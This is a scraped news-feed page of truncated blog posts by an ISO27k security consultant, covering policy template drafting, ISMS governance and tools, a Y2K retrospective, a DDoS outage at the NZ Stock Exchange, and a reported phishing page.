concern; Understandings of 'information', 'risk' and 'management' etc. – different goals/objectives, constraints and opportunities, even within a given organization/management team (and sometimes even within someone's head!); Perspectives: the bungee jumper, bungee supplier and onlookers have markedly different appreciations of the same risks; Ways of structuring things within the specifications of '27001, since individual managers and management teams have the latitude to approach things differently, making unique decisions based on their understandings,]]> 2021-04-23T15:58:38+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/z4BraQ4C6tI/kiss-or-optimise-your-iso27k-isms.html www.secnews.physaphae.fr/article.php?IdArticle=2681635 False Guideline None None NoticeBored - Experienced IT Security professional Today we completed and published a new "topic-specific" information security policy template on clear desk and screen.Having previously considered information risks within the policy scope, writing the policy involved determining how to treat the risks and hence what information security or other controls are most appropriate.  Here we drew on guidance from the ISO27k standards, plus other standards, advisories and good practices that we've picked up in the course of ~30 years in the field, working with a variety of industries and organizations - and that's an interesting part of the challenge of developing generic policy templates. Different organizations - even different business units, departments, offices or teams within a given organization - can take markedly different attitudes towards clear desk and screen. The most paranoid are obsessive about it, mandating controls that would be excessive and inappropriate for most others. Conversely, some are decidedly lax, to the point that information is (to my mind) distinctly and unnecessarily vulnerable to deliberate and accidental threats. We've picked out controls that we feel are commonplace, cost-effective and hence sensible for most organizations.COVID19 raises another concern, namely how the risks and controls in this area vary between home offices or other non-corporate 'working from home' workplaces, compared to typical corporate offices and other workplaces. The variety of situations makes it tricky to develop a brief, general policy without delving into all the possibilities and specifics. The approach we've taken is to mention this aspect and recommend just a few key controls, hoping that workers will get the point. Customers can always customise the policy templates, for example adding explicit restrictions for particular types of information, relaxing things under certain conditions, or beefing-up the monitoring, oversight and compliance controls that accompany the policies - which is yet another complicating factor: the business context for information security policies goes beyond the written words into how they are used and mandated in practice.Doing all of this in a way that condenses the topic to just a few pages of good practice guidance, well-written in a motivational yet generic manner, and forms a valuable part of the SecAware policy suite, explains the hours we've sunk into the research and writing. Let's hope it's a best seller!    ]]> 2021-04-19T14:51:35+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/SYeVfVCMw28/policy-development-phase-2.html www.secnews.physaphae.fr/article.php?IdArticle=2664448 False None None None NoticeBored - Experienced IT Security professional On Sunday I blogged about preparing four new 'topic-specific' information security policy templates for SecAware. Today I'm writing about the process of preparing a policy template.First of all, the fact that I have four titles means I already have a rough idea of what the policies are going to cover (yes, there's a phase zero). 'Capacity and performance management', for instance, is one requested by a customer - and fair enough. As I said on Sunday, this is a legitimate information risk and security issue with implications for confidentiality and integrity as well as the obvious availability of information. In my professional opinion, the issue is sufficiently significant to justify senior management's concern, engagement and consideration (at least). Formulating and drafting a policy is one way to crystallise the topic in a form that can be discussed by management, hopefully leading to decisions about what the organisation should do. It's a prompt to action.At this phase in the drafting process, I am focused on explaining things to senior management in such a way that they understand the topic area, take an interest, think about it, and accept that it is worth determining rules in this area. The most direct way I know of gaining their understanding and interest is to describe the matter 'in business terms'. Why does 'capacity and performance management' matter to the business? What are the strategic and operational implications? More specifically, what are the associated information risks? What kinds of incident involving inadequate capacity and performance can adversely affect the organization?Answering such questions is quite tough for generic policy templates lacking the specific business context of a given organisation or industry, so we encourage customers to customise the policy materials to suit their situations. For instance:An IT/cloud service company would probably emphasise the need to maintain adequate IT capacity and performance for its clients and for its own business operations, elaborating on the associated IT/cyber risks.A healthcare company could mention health-related risk examples where delays in furnishing critical information to the workers who need it could jeopardise treatments and critical care.A small business might point out the risks to availability of its key workers, and the business implications of losing its people (and their invaluable knowledge and experience i.e. information assets) due to illness/disease, resignation or retirement. COVID is a very topical illustration. An accountancy or law firm could focus on avoiding issues caused by late or  incomplete information - perhaps even discussing the delicate balance between those two aspects (e.g. there a]]> 2021-04-13T11:17:11+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/Jut-vvWbIKA/policy-development-process-phase-1.html www.secnews.physaphae.fr/article.php?IdArticle=2628026 False Guideline None None NoticeBored - Experienced IT Security professional We're currently preparing some new information risk and security policies for SecAware.com.  It's hard to find gaps in the suite of 81 policy templates already on sale (!) but we're working on these four additions:Capacity and performance management: usually, an organization's capacity for information processing is managed by specialists in IT and HR.  They help general management optimise and stay on top of information processing performance too.  If capacity is insufficient and/or performance drops, that obviously affects the availability of information ... but it can harm the quality/integrity and may lead to changes that compromise confidentiality, making this an information security issue.  The controls in this policy will include engineering, performance monitoring, analysis/projection and flexibility, with the aim of increasing the organisation's resilience. It's not quite as simple as 'moving to the cloud', although that may be part of the approach.Information transfer: disclosing/sharing information with, and obtaining information from, third party organisations and individuals is so commonplace, so routine, that we rarely even think about it.  This policy will outline the associated information risks, mitigating controls and other relevant approaches.Vulnerability disclosure: what should the organisation do if someone notifies it of vulnerabilities or other issues in its information systems, websites, apps and processes? Should there be mechanisms in place to facilitate, even encourage notification? How should issues be addressed?  How does this relate to penetration testing, incident management and assurance?  Lots of questions to get our teeth into!Clear desks and screens: this is such a basic, self-evident information security issue that it hardly seems worth formulating a policy. However, in the absence of policy and with no 'official' guidance, some workers may not appreciate the issue or may be too lazy/careless to do the right thing. These days, with so many people working from home, the management oversight and peer pressure typical in corporate office settings are weak or non-existent, so maybe it is worth strengthening the controls by reminding workers to tidy up their workplaces and log off.  It's banale, not hard! The next release of ISO/IEC 27002 will call these "topic-specific information security policies" focusing on particular issues and/or groups of people in some detail, whereas the organisation's "information security policy" is an overarching, general, ]]> 2021-04-11T14:52:31+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/947ehLndxmU/infosec-policy-development.html www.secnews.physaphae.fr/article.php?IdArticle=2619342 False Guideline None None NoticeBored - Experienced IT Security professional Cyber StrategyRisk-driven Security and ResiliencyAuthors: Carol A. Siegel and Mark SweeneyPublisher: Auerbach/CRC PressISBN: 978-0-367-45817-1Price: ~US$100 + shipping from AmazonOutlineThis book lays out a systematic process for developing corporate strategy in the area of cyber (meaning IT) security and resilience.  ProsAn in-depth exposition on an extremely important topicIt emphasises risks to the business, to its information, and to its IT systems and networks, in that orderSystematic, well structured and well written, making it readable despite the fairly intense subject matterLots of diagrams, example reports and checklists to help put the ideas into actionTreating strategy development as a discrete project is an intriguing approachConsDescribes a fairly laborious, costly and inflexible approach, if taken literally and followed STEP-by-STEPImplies a large corporate setting, with entire departments of professionals specializing and willing to perform or help out in various areas A little dogmatic: alternative approaches are not only possible but sufficient, appropriate or even better under various circumstances, but strategic options and choices are seldom mentionedAs described, the strategy planning horizon is very shortAn entirely defensive risk-averse strategic approach is implied ]]> 2021-03-11T12:10:12+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/KgwKZpva4ho/nblog-mar-11-book-review-on-cyber.html www.secnews.physaphae.fr/article.php?IdArticle=2464792 False None None None NoticeBored - Experienced IT Security professional It feels like 'just the other day' to me but do you recall "Y2k" and all that? Some of you reading this weren't even born back then, so here's a brief, biased and somewhat cynical recap.For a long time prior to the year 2000, a significant number of software programmers had taken the same shortcut we all did back in "the 90s". Year values were often coded with just two decimal digits: 97, 98, 99 ... then 00, "coming ready or not!"."Oh Oh" you could say. "OOps".When year counters went around the clock and reset to zero, simplistic arithmetic operations (such as calculating when something last happened, or should next occur) would fail causing ... well, potentially causing issues, in some cases far more significant than others.Failing coke can dispensers and the appropriately-named Hornby Dublo train sets we could have coped with but, trust me, you wouldn't want your heart pacemaker, new fangled fly-by-wire plane or the global air traffic control system to decide that it had to pack up instantly because it was nearly 100 years past its certified safe lifetime. Power grids, water and sewerage systems, transportation signalling, all manner of communications, financial, commercial and governmental services could all have fallen in a heap if the Y2k problems wasn't resolved in time, and this was one IT project with a hard, immutable deadline, at a time when IT project slippage was expected, almost obligatory. Tongue-in-cheek suggestions that we might shimmy smoothly into January 1st [19]9A were geekly-amusing but totally impracticable. In risk terms, the probability of Y2k incidents approached 100% certain and the personal or societal impacts could have been catastrophic under various credible scenarios - if (again) the Y2k monster wasn't slain before the new year's fireworks went off ... and, yes, those fancy public fireworks display automated ignition systems had Y2k failure modes too, along with the fire and emergency dispatch systems and vehicles. The combination of very high probability and catastrophic impact results in a risk up at the high end of a tall scale. So, egged-on by information security pro's and IT auditors (me, for instance), management took the risk seriously and invested significant resources into solving "the Y2k issue". Did you spot the subtle shift from "Y2k" to "the Y2k issue"? I'll circle back to that in just a moment. Individual Y2k programming updates were relatively straightforward on the whole (with some interesting exceptions, mostly due to prehistoric IT systems still in use well past their best-before dates, with insurmounta]]> 2021-01-10T10:34:21+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/0xVDEQAmq2s/y2k-20-risk-covid-and-internet-issue.html www.secnews.physaphae.fr/article.php?IdArticle=2165023 False Guideline None None NoticeBored - Experienced IT Security professional I literally don't understand a question that came up on the ISO27k Forum this week. A member asked:'Should a control be discontinued because a reassessment showed a lower acceptable risk score?' I find it interesting to pick apart the question to explore the reasons why I don't understand it, and the implications. See what you think ...  Any control may legitimately be 'discontinued' (removed, unimplemented, retired, replaced, modified etc.) provided that change has been duly thought-through, assessed, justified, and deemed appropriate for whatever reasons. It may be important, though, to be reasonably certain that discontinuation is, in fact, in the best interests of the organization, and that's often hard to determine as controls can be quite complex in themselves, and are part of a highly complex 'control environment'. A seemingly trivial, unimportant, even redundant control (such as an alert) might turn out to be critical under specific circumstances (where other alerts fail, or were accidentally disabled, or were actively and deliberately bypassed by an attacker or fraudster). So, it may be preferable to 'suspend' the control for a while, pending a review to determine what the effects truly are … since it is probably easier and quicker to reinstate a 'suspended' control if needs be, than it would have been if the control was completely removed and trashed. A dubious firewall  rule, for example, might be set to 'warn and log only', rather than simply being dropped from the ruleset, the reverse o]]> 2020-11-15T10:43:57+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/mcMU_bOc4UI/nblog-nov-15-trouble-with-dropping.html www.secnews.physaphae.fr/article.php?IdArticle=2148824 False None None None NoticeBored - Experienced IT Security professional Yet another good question came up on the ISO27k Forum today*. Someone asked whether to add the company's Facebook page to their information asset register (implying that it would need to be risk-assessed and secured using the Information Security Management System processes), or whether the asset should be the Facebook account (ID and password, I guess)**.From the marketing/corporate perspective, good customer relations are perhaps the most valuable information assets of all, along with other external relations (e.g. your suppliers, partners, prospective and former customers, regulators/authorities and owners) and internal relations (the workforce, including staff, management, contractors, consultants and temps, plus former and prospective workers). It's tempting to think of these as just categories or faceless corporations, but in reality the interactions are between individual human beings, so social relationsin general are extremely important in business.  There are numerous mechanisms that generate, support and maintain good customer relations, Facebook for example. Likewise for other relations (e.g. ISO27k Forum!). You might think of them as simply apps or information services, often cloud based, often commercial services provided by third parties hence limiting what is on offer and your options or influence over the infosec, privacy and other requirements.  There are also related processes and activities, some of which have infosec, privacy and other implications e.g. I have a bank pestering me right now for identification info which they need from me as part of the anti money laundering regs: it's a pain for me and for them, but they have to comply with the laws and regs. Workforce relationship management and 'industrial relations' is a huge part of 'management', with governance, compliance and other implications and risks. Overall, relationship management is, clearly, an important part of business success, or indeed failure when things go horribly wrong (e.g. look up the Ratners jewelers fiasco in the UK, and just look around at the difficulties arising from COVID-19: our people and myriad relationships are under extreme stress this year, not just our organisations). Summing up, I encourage everyone to think big in terms of the scope of information assets, with a strong emphasis on the information that matters most to the business, the organization, and its strategic objectives. The IT systems and services are merely business tools: what matters most is the business information generated/processed by them.* As I've said before, it's funny how often a simple, seemingly basic or naive question on ISO27k Forum leads to something more revealing when the answers and debate sta]]> 2020-10-08T05:41:06+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/yi7jHwNMpPE/nblog-oct-8-is-facebook-asset.html www.secnews.physaphae.fr/article.php?IdArticle=2148825 False Guideline None None NoticeBored - Experienced IT Security professional Are you responsible for your organisation's information security or cybersecurity budget? Are you busily putting the finishing touches to your 2021 budget request, still working on it, just thinking about it, or planning to do it, honestly, when you next come up for breath?Budgeting is generally a dreaded, stressful management task. Not only do we have to figure out the figures but we typically anticipate a tough battle ahead leading (probably) to a disappointing outcome and yet more problems.On top of that, 2020 has been an exceptional year thanks to COVID. The business and information security implications of knowledge workers suddenly working from home, en masse, are still playing out now, while the economic impacts of COVID do not bode well for any of next year's budgets except perhaps for the manufacture of vaccines, masks, gloves, sanitiser and respirators.A substantial part of information security expenditure is (whatever we may believe as professionals) discretionary. The decision to go for ISO/IEC 27001 certification, for instance, flows largely from management's appreciation of the business value of investing in information risk and security management good practices. There may be specific drivers such as incidents, compliance pressures or demands from business owners, partners and prospective customers, but even then there are numerous options and factors to consider such as:The objectives for the Information Security Management System - what it is expected to achieve;How broadly or narrowly to scope the ISMS;At what pace to implement the standard, and how precisely;What resources to assign to the implementation, not least a suitable implementation project manager/consultant and project team;Priorities for this work relative to other business activities, objectives and requirements, making adjustments as necessary (both initially and as the project proceeds when stuff comes up - as COVID did, for instance);Alignment with other corporate projects and initiatives e.g. exploiting strategic opportunities to update various systems, policies and processes for security and other reasons, at the same time;Change management aspects: does the organisation have the capacity and appetite first to adopt and assimilate the ISMS, and secondly to get the most out of it; Project risks e.g. the possibility that things probably w]]> 2020-09-27T17:59:17+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/ZKVsWHrDvlg/nblog-sept-27-2021-infosec-budget.html www.secnews.physaphae.fr/article.php?IdArticle=2148826 False Guideline None None NoticeBored - Experienced IT Security professional One of the recurrent (zombie) threads on the ISO27k Forum concerns the status of ISO/IEC 27001:2013 Annex A. Typically the zombie is prodded from its slumber by a relatively inexperienced member naively suggesting that certain security controls from Annex A are essential, implying that they are mandatory for certification.In the course of debating and attempting to bury the zombie, some members trot out their own curious interpretations of the standard, pointing out actual and apparent discrepancies in the wording which, to them, indicate that Annex A is at least partly mandatory. I'm too polite to say they are wrong, but I believe they are misguided or mistaken - partly, it must be admitted, because the standard is ambiguously worded in some areas, hence it has to be interpreted carefully in practice. To be clear, based on my three decades' professional experience and membership of ISO/IEC JTC 1/SC 27, my position is that none of the controls outlined in Annex A are mandatory. None at all. Zero.This is a fundamental but complex issue to explain, so please forgive this lengthy post. In hope of decapitating the zombie, once and for all, I feel the urge to explain in detail. To kick off, I'll emphasise the critical distinction between two key terms: Mandatory]]> 2020-09-24T11:12:00+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/ziV7PblL41g/nblog-sept-24-status-of-iso27001-annex-a.html www.secnews.physaphae.fr/article.php?IdArticle=2148827 False None None None NoticeBored - Experienced IT Security professional We've been chatting on the ISO27k Forum lately about using various IT systems to support ISO27k ISMSs. This morning, in response to someone saying that a particular tool which had been recommended did not work for them, Simon Day made the point that "Each organisation trying to implement an ISMS will find it's own way based on their requirements."Having surveyed the market for ISMS products recently, I followed-up with my usual blurb about organisations having different information risks and business situations, hence their requirements in this area are bound to differ, and in fact vary dynamically (in part because organisations mature as they gain experience with their ISMS: their needs change). The need for flexibility is why the ISO27k standards are so vague (essentially: figure out your own requirements by identifying and evaluating your information risks using the defined governance structure - the ISMS itself), rather than explicitly demanding particular security controls (as happens with PCI-DSS). ISO27k is designed to apply to any organisation. That thought sparked a creative idea that I've been contemplating ever since: wouldn't it be wonderful if there was a standard for the data formats allowing us to migrate easily between IT systems supporting ISO27k ISMSs?I'm idly thinking about a standard file format with which to specify information risks (threats, vulnerabilities, impacts and probabilities), controls, policies, procedures, metrics, objectives etc. - maybe an XML schema with specified field names and (where applicable) enumerated lists of values.Aside from migrating between ISMS IT support systems and services, standard data formats would facilitate data sharing between application systems, services or sub-functions (e.g. for vulnerability management, incident management and information risk management), and between departments or even organisations (e.g. insurance companies, auditors and advisors and their clients and partners).Perhaps we should develop an outline specification and propose such a standard to ISO/IEC JTC1 SC 27. A New W]]> 2020-09-04T14:26:51+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/SUEgRfvSeI0/nblog-sept-4-standardising-isms-data.html www.secnews.physaphae.fr/article.php?IdArticle=2148828 False Tool,Vulnerability None None NoticeBored - Experienced IT Security professional Having drafted a generic requirement specification for systems supporting an ISO27k ISMS, I'm slowly trawling the Web for products in the hope of finding apps, templates and services that we would be willing to use ourselves and recommend to our consulting clients.So far I've found about 20 commercial or open-source ISMS systems plus maybe twice that number of risk management systems, plus quite a variety of more focused systems supporting incident management, business continuity, vulnerability management, patch management etc. It's a confusing, sprawling and dynamic market … so I'm also working on a structured evaluation process that will help us pick out gems from the stones on offer, depending on our own and our clients' specific needs.Along the way, I've picked up murmurings of discontent from customers saddled with low-quality content supplied with some ISO27k ISMS systems and toolkits. Aside from variation between the products, could it be, I wonder, that some of the products currently on offer are inadequate because customers vary so much in size, complexity, maturity etc. having different expectations or requirements? Could this be a side-effect of ISO27k's intended application to all organizations, resulting it being jack-of-all-trades and master-of-none? We could develop generic content specifically targeting particular market segments or types of organisation ... but instead we've started with the basics that every ISO27k ISMS needs with the intention of offering optional add-ons, giving customers more choice. One of those options is to develop custom materials and support individual customers to implement and optimise their ISMSs using appropriate systems/tools, provided we can convince management of the value of our consultancy services - and that's a tough sell, especially during COVID-19. Doing it all in-house may be a viable option if the organisation has the people with the requisite skills, competencies, knowledge and experience. That seems unlikely if there is no ISMS already in place - catch 22. There's also the matter of the time needed for people to learn the ropes and get up to speed with the ISMS, given all the other things on the go: the longer things drift along, the more the organisation remains subject to information risks that may not be managed effectively.I'm working on other options too. More info to follow. Watch this space.]]> 2020-09-04T14:22:25+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/ZSY5gwkKehU/nblog-july-15-iso27k-isms-products.html www.secnews.physaphae.fr/article.php?IdArticle=2148845 False Vulnerability None 3.0000000000000000 NoticeBored - Experienced IT Security professional We're on a mission to convince every organisation that managing information risks properly is more than just a compliance imperative. It's good for business.Is your organisation looking to raise its security game? Are managers worried about ransomware, privacy breaches and intellectual property theft, especially now with so many of us working from home? What about the business continuity risks as supply chains are stressed to breaking point by COVID-19? Are your suppliers cutting corners on privacy and security, hoping nobody will notice? Are desperate competitors taking advantage of the disruption to undermine your cyber-defences?Worse still, is management blissfully unaware of the issues, with everyone heads-down, rowing hard, too busy to notice the icebergs dead ahead?... Or is there a strong drive to secure and exploit information as an integral part of operations? Does being trusted by customers and stakeholders equate to brand value, new and repeat business, opening up strategic opportunities?This is a great opportunity totake the first step on your mission!We have developed a modular approach based on ISO/IEC 27001. An Information Security Management System facilitates the management of information risks, information security controls, governance and assurance arrangements and so forth, 'systematically' i.e. in a structured and coherent way.Despite being standards, ISO27k acknowledges that each organisation needs to adapt the ISMS according to the business situation and the associated information risks. Within the same general governance structure, the specific requirements vary markedly between organisations and industries. With that in mind, we've developed a suite of materials covering the mandatory requirements for every ISMS, plus add-ons for the discretionary parts. In truth, all of them - even the mandatory ones - are templates, designed to be customised ... and we can even help you with that if you like!Through SecAware.com, we offer several packages:ISMS Launchpad is a minimalist set of templates for the mandatory]]> 2020-09-03T16:03:50+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/_UnpZquht2M/nblog-sept-3-iso27001-rocket-fuel.html www.secnews.physaphae.fr/article.php?IdArticle=2148829 False None None None NoticeBored - Experienced IT Security professional The New Zealand Stock Exchange is having a rough week.  Under assault from a sustained DDoS attack, its web servers have crumpled and fallen in an untidy heap again today, the fourth day of embarrassing and costly disruption.DDoS attacks are generally not sophisticated hacks but crude overloads caused by sending vast volumes of data to overwhelm the servers.  The Host Error message above shows "RedShield" which appears to be a security service remarkably similar to a Web Application Firewall (although the company claims to be producing something far better) ...If so, RedShield appears to be passing DDoS traffic to the stock exchange web servers which can't cope. Presumably, this particular DDoS attack does not fit the profile of the attacks that RedShield is designed to block, in other words RedShield is patently not preventing the DDoS.I don't know whether RedShield is supposed to block DDoS traffic and is failing to do so, or if DDoS protection is simply not part of the RedShield service. Either way, it appears a DDoS attack is causing business impacts.]]> 2020-08-28T15:19:43+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/DRgby8YTNjc/nblog-aug-28-nz-stock-exchange-ddos.html www.secnews.physaphae.fr/article.php?IdArticle=2148830 False Guideline None None NoticeBored - Experienced IT Security professional A couple of days ago I blogged about MURAL, just one of many creative tools supporting collaborative working. If you missed it, please catch up and contemplate about how you might use tools such as that right now for teamworking during the COVID19 lockdowns.Today I've been thinking about 'the new normal' as the world emerges from the pandemic, inspired by the intersection of two threads.Firstly, thanks to a Zoom session with participants and presenters from Queensland, I've been reading-up on "industry 4.0". I'm not totally au fait with it yet but as I see it the key distinguishing features are:Ever-increasing automation of manufacturing, with smart devices and robotics supplementing the capabilities of both manual and knowledge workers;Industrial IoT, coupling sensors and actuators on the production line with each other, allowing workers to interact with the machinery through screens and keyboards etc. and a growing  layer of automation smarts and networking;Ever-increasing reliance on IT, data, analytics, systems and artificial intelligence (with implications for risk, resilience, reliability and security);New capabilities, particularly in the specification and design areas - such as virtual reality simulations and rapid prototyping of jigs, machines and products by "additive manufacturing" (industrial 3D printers);An increasing focus on adding value through knowledge work in research and development plus product service/support, de-emphasising the manufacturing production core activities (which, I guess, started with the off-shoring of manufacturing to low-wage economies, and is now leading to both on- and off-shore automated manufacturing);  Rapid innovation and change, leading to difficulties in strategic corporate planning (with credible planning horizons falling to just a couple of years!) and personal career planning (e.g. how can workers learn to use tools and techniques that either aren't refined enough to be taught, perhaps not even invented yet?);Shortages of people with the requisite skills, knowledge and adaptability, able to thrive despite the challenges and seize opportunities as they arise.]]> 2020-08-27T18:50:44+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/aNv7pK12tsE/nblog-aug-27-creative-teamwork-post.html www.secnews.physaphae.fr/article.php?IdArticle=2148831 False Guideline None None NoticeBored - Experienced IT Security professional Yesterday I started preparing an ISMS communications plan to satisfy ISO/IEC 27001:2013 clause 7.4, with a little help from the Web.Naturally I started out with the standard itself. Clause 7.4 doesn't literally demand that organisations must have a "communications plan" as such, otherwise it would have been one of the mandatory documents included in SecAware ISMS Launchpad. Oh no, it's more circumspect: the standard says "the organization shall determine the need for internal and external communications relevant to the information security management system" ... and proceeds to outline - yes, you guessed it - a "communications plan".ISO/IEC 27003:2017 confirms our assessment by stating explicitly:"Documented information on this activity and its outcome is mandatory only in the form and to the extent the organization determines as necessary for the effectiveness of its management system". In other words, a documented comms plan is discretionary - advised as good practice but not strictly demanded of every organisation for '27001 compliance certification.Well anyway, let's do it! To comply with the standard, what should typically be communicated in respect of the ISMS, when, to and by whom, and by what means?ISO/IEC 27003 offers examples of the things that should be communicated:Information security policies and procedures, plus changes thereto;[The organisation's] Information [risk and] security objectives;Knowledge on information security risks; Requirement]]> 2020-08-26T12:41:58+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/CK4anVr3ZIo/nblog-aug-23-isms-comms-plan.html www.secnews.physaphae.fr/article.php?IdArticle=2148833 False None None None NoticeBored - Experienced IT Security professional SecAware ISMS Launchpad:That succinct one-pager addresses two requirements from the standard:Clause 9.2 (c) says (in part) "The organisation shall plan, establish, implement and maintain an audit programme(s)" - an explicit documentation requirement that the certification auditors will definitely check for compliance;Clause 9.3 says (in part) "Top management shall review the organization's information security management system at planned intervals to ensure its continuity suitability, adequacy and effectiveness." - an implicit documentation requirement that the certification auditors will probably check for compliance, and although the standard doesn't literally demand it, they may well insist on seeing written evidence that management reviews have been planned.Those clauses lay out fairly succinctly what it means to internally audit or management review the ISMS: I have interpreted the requirements in terms of activities that might be performed quarterly over two years as shown on the schedule, with brief descriptions about the approaches to be taken ... but, as with all the SecAware materials, they are merely generic suggestions that customers are encouraged to adapt. Large, mature organisations with Internal Audit functions, for instance, may well engage them to plan and perform the ISMS internal audits using their conventional audit approach and whatever associated documentation they normally produce. They may prefer to audit the ISMS just once during the three year certification cycle, or conversely they may want to focus on a series of specific areas of risk and concern over successive audits, perhaps integrating the ISMS audit work with other IT, risk, cybersecurity or complian]]> 2020-08-26T12:38:57+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/DlNe_O4AFDg/nblog-aug-26-isms-templates.html www.secnews.physaphae.fr/article.php?IdArticle=2148832 False None None None NoticeBored - Experienced IT Security professional MURAL today.MURAL is a 'digital workspace for visual collaboration' by virtual teams.   The animated demonstration on their home page caught my beady eye. Here's a static snapshot as a small group of people are busy placing/moving blobs on a graphic, presumably while discussing what they are doing on a parallel channel (e.g. Zoom):]]> 2020-08-21T05:23:45+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/TkxYG4SEY68/nblog-aug-20-creative-teamwork-in.html www.secnews.physaphae.fr/article.php?IdArticle=2148834 False Guideline None None NoticeBored - Experienced IT Security professional Some time back I bumped into a handy management guide on information risk - a double-sided leaflet from the Information Assurance Advisory Council. In 2015, it inspired a security awareness briefing explaining that colourful process diagram, which has now morphed into a further 5-page briefing on Information Risk Management, soon to join the SecAware ISMS templates.Googling for the IAAC guide led me to a cluster of FREE Directors' Guides from the IAAC offering useful, relevant guidance for senior management:Why Information Risk is a Board Level Issue - is a backgrounder including this apt and succinct explanation:"Information Risk encompasses all the challenges that result from an organisation's need to control and protect its information."Governance and Structures - describes directors' governance responsibilities relating to information risk:"Directors need to put in place the arrangements and processes by which responsibilities are distributed and significant information risk decisions are to be made and reviewed."Information Risk Management Approach - encourages directors to support the remainder of the organisation in fulfilling their responsibilities for information risk, ensuring strategic alignment between risk management and business objectives.Realising the Benefits - outlines the business benefits of good information risk management in terms of: efficiency; agility; manageability; exploitation of new opportunities (more confidently expanding into new areas of business); customer retention; brand strengthening; cost-efficient compliance; and dealing efficiently with incidents."Good information risk mitigation supports organisational strategies and tactical agil]]> 2020-08-19T19:48:48+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/Fb9FiI1qHp0/nblog-aug-19-iaac-directors-guides.html www.secnews.physaphae.fr/article.php?IdArticle=2148835 False Studies,Guideline None None NoticeBored - Experienced IT Security professional I have lightly redacted the URL, but those action buttons are clearly not pointing to an IsecT domain.  Firebase Storage is a Google cloud storage/app service:Google promotes Firebase security in terms of high availability and authentication for their customers i.e. web developers using Firebase to host content on the web. No mention of security for their customers' victims though and although Google can't be held entirely responsible for its customers' nefarious activities, I presume (hope!) they have the processes in place to identify and respond efficiently to incidents of this nature.I've reported this incident through a Firebase customer support channel as there is no obvious way for us to report misuse of their services by phishers etc.I'll let you know how they respond.]]> 2020-08-13T06:05:41+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/zqXoR2wChAo/nblog-aug-13-google-customers-phishing.html www.secnews.physaphae.fr/article.php?IdArticle=2148836 False None None None NoticeBored - Experienced IT Security professional This morning I've been studying the final draft of the forthcoming second edition of ISO/IEC 27014 "Governance of information security", partly to update ISO27001security.com but mostly out of my fascination with the topic.Section 8.2.5 of the standard specifies the governance objective to "Foster a security-positive culture":"Governance of information security should be built upon entity culture, including the evolving needs of all the interested parties, since human behaviour is one of the fundamental elements to support the appropriate level of information security. If not adequately coordinated, the objectives, roles, responsibilities and resources can conflict with each other, resulting in the failure to meet any objectives. Therefore, harmonisation and concerted orientation between the various interested parties is very important. To establish a positive information security culture, top management should require, promote and support coordination of interested party activities to achieve a coherent direction for information security. This will support the delivery of security education, training and awareness programs. Information security responsibilities should be integrated into the roles of staff and other parties, and they should support the success of each ISMS by taking on these responsibilities."Not bad that although, personally, I would have mentioned senior management setting 'the tone at the top', in other words influencing the entire corporate culture through their leadership, decisions, direction and control, particularly in the way they behave.For example, even though management may formally insist upon ethical behaviour as a policy matter, if managers in fact act unethically, push the boundaries of ethicality through their decisions and priorities, or simply tolerate (turn a blind eye to, fail to address) unethical/dubious activities, that can severely erode if not destroy the value of the policy. Workers observant enough to spot the disconnect between theory and practice are, in effect, enabled or even encouraged to decide for themselves whether to comply with the policy. In a disciplinary situation, management's failure to enforce compliance with ]]> 2020-08-10T11:44:49+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/vcwOkXVtKNk/nblog-aug-8-musing-on-isoiec-27014.html www.secnews.physaphae.fr/article.php?IdArticle=2148837 False Guideline None None NoticeBored - Experienced IT Security professional Seeing the term 'operational resilience' being bandied about right now, I thought I'd take a closer look, starting with the definitions.So what is 'operational resilience'?  It is:"a set of techniques that allow people, processes and informational systems to adapt to changing patterns. It is the ability to alter operations in the face of changing business conditions. Operationally resilient enterprises have the organizational competencies to ramp up or slow down operations in a way that provides a competitive edge and enables quick and local process modification." says Gartner."both a process and a characteristic of an organization to adapt rapidly to changing environments and needs. It is an organizational trait that allows it to carry out its mission or business despite the presence of operational stress and disruption. In other words, it is the organization's ability to handle and control external factors that may hinder it from functioning." says Techopedia."financial resilience" says Accenture (begging the question: What is financial resilience?)."the ability of firms and the financial sector as a whole to prevent, adapt, respond to, recover, and learn from operational disruptions" says the Bank of England."the ability of an organisation to adapt rapidly to changing environments. This includes both the resilience of systems and processes and more generally the ability of the organisation to continue to operate its business in the event of disruptive events." says KPMG.... and so on.Some commentators focus on specific aspects that interest or concern them - financial stability for example, and systemic failure of highly integrated and interdependent industries. ]]> 2020-08-10T11:41:46+00:00 http://feedproxy.google.com/~r/NoticeBored/~3/WSPPsx9w-6E/nblog-7-aug-what-is-operational.html www.secnews.physaphae.fr/article.php?IdArticle=2148838 False None None None NoticeBored - Experienced IT Security professional For the next phase of SecAware ISMS, I'm documenting the management process for determining and allocating information risk and security responsibilities. The procedure itself is straightforward - just one page of written instructions covering a simple four step process - but a raft of examples of the activities various functions perform in relation to information risk and security takes it up to six pages, even though the examples are presented tersely as bullet points.It turns out there may be several corporate functions, teams and individuals, each performing numerous activities relating to information risk and security.  Admittedly, my knowledge in this area has accumulated in the course of working mostly for large, relatively mature organisations, a couple of which had all of the functions staffed by professionals busily performing virtually all of the activities. Small-to-medium sized organisations don't have the luxury of being able to carve-up the work among dedicated teams of specialists, so they usually get by with multi-tasking and perhaps assistance from third parties. Information risk and security is tougher for micro-organisations, particularly if they don't even have anyone who appreciates the need to manage information risk and security, privacy, compliance, business continuity etc. The ISO27k framework can help all types and sizes of organization provided it is interpreted and applied sensibly according to the business context and needs. Even though a multinational bank, say, might have specialists within HR and other functions whose job it is to prepare job descriptions, vacancy notices, training plans etc., our generic list of information risk and security activities may be 